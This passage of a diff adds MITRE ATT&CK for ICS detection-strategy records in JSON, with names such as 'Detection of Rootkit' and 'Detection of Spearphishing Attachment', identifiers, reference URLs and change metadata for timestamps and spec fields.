+                    ],
+                    "name": "Detection of Remote System Information Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f123f13f-b6f4-4e86-96cd-14df0e855e0f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--cb273244-c117-4e32-afc7-f72f4e44e179",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0733",
+                            "external_id": "DET0733"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Replication Through Removable Media",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9ad83be0-5c88-4fb6-b59d-19db21176923"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9ad17e7a-5920-42ac-9bf4-545b99162640",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0792",
+                            "external_id": "DET0792"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Rogue Master",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--37d989e6-14cd-49a4-adec-3d8b72c8dc22"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--04bcf663-e6cd-42bf-8864-f4d1ad345263",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0780",
+                            "external_id": "DET0780"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Rootkit",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ec695157-8c3c-439b-9925-459c9d4172f0"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3e884c49-75ca-449e-83cb-3517ee88e0f1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0751",
+                            "external_id": "DET0751"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Screen Capture",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--66070162-d51e-46e7-8d32-2140fd5e7086"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f9ea25e7-6e63-4ef1-a8ad-47a4a261e175",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0735",
+                            "external_id": "DET0735"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Scripting",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--302a5327-70cf-44b5-b592-ce9a62014dcc"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b25c4621-5d38-43ee-871e-0e5c02f2f48c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0765",
+                            "external_id": "DET0765"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Service Stop",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6b3b3e92-bef7-4977-9895-29036bab29f1"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--31773402-e407-4ed3-b86c-7a8587dc5ec9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 17:55:10.734000+00:00",
+                    "modified": "2026-05-12 16:30:18.390000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0906",
+                            "external_id": "DET0906"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Siemens Project File Format Infection",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6a510bf0-0289-4eb0-8645-89f0f4d32cf3"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2026-04-22 17:55:10.734000+00:00\", \"old_value\": \"2026-04-22T17:55:10.734Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.390000+00:00\", \"old_value\": \"2026-04-24T20:31:24.570Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b817139c-2941-4523-bfb5-10c36d230871",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.689000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0781",
+                            "external_id": "DET0781"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Spearphishing Attachment",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5610211c-1458-4333-8640-384189d9318e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.689000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c0e6c96d-8605-407a-9bce-628e7853b07f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0746",
+                            "external_id": "DET0746"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Spoof Reporting Message",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--32bfb2ab-2ad1-4c00-8428-96bc626c34f3"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--732d2487-3241-4866-8bb5-044bb4acdd3b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0799",
+                            "external_id": "DET0799"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Standard Application Layer Protocol",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d271c7fc-d76a-4fb0-a645-5db2c1223a32"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--58b4bda4-d69a-4a20-ab67-308c4451a5e8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0730",
+                            "external_id": "DET0730"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Supply Chain Compromise",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--899d0dce-64f7-4924-93a1-8e3c83dd510f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--519082ce-24ab-4f6b-9e86-b9443758c9d4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0793",
+                            "external_id": "DET0793"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of System Binary Proxy Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--23ce0ac3-6afe-4647-be72-e1e9bcd1490e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--09f46edf-33f9-4c23-af2f-74864c27f616",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0731",
+                            "external_id": "DET0731"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of System Firmware",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3f10ffe9-fa73-4aeb-bf98-322831bf757f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--2145faf1-28da-4ebc-9730-f2e2a8764ced",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0732",
+                            "external_id": "DET0732"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Theft of Operational Information",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--cd4c92f9-3107-45c7-9d95-19a44d7dc92c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8ae936b6-b635-4104-bd11-81c18d90cf97",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0744",
+                            "external_id": "DET0744"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Transient Cyber Asset",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9127dd4e-0994-442f-8d73-b6b2dfb1f9ac"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d8cb1dd3-8bf2-48e7-99db-473481b823a8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0794",
+                            "external_id": "DET0794"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Unauthorized Command Message",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--23eb2bc3-735d-4425-96e1-f9d3a1453bfa"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f487a605-0acb-4b12-b157-33b75ebd9a40",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 14:32:49.664000+00:00",
+                    "modified": "2026-05-12 16:30:18.391000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0902",
+                            "external_id": "DET0902"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Unauthorized Message",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--613b28ef-88dd-4008-8d7e-206ce55a7cde"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2026-04-22 14:32:49.664000+00:00\", \"old_value\": \"2026-04-22T14:32:49.664Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.391000+00:00\", \"old_value\": \"2026-04-24T20:31:37.796Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--eabde43f-1872-499d-9642-85a6959c4d28",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0791",
+                            "external_id": "DET0791"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of User Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d937e4b8-20f2-44c1-9940-48c74318c715"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
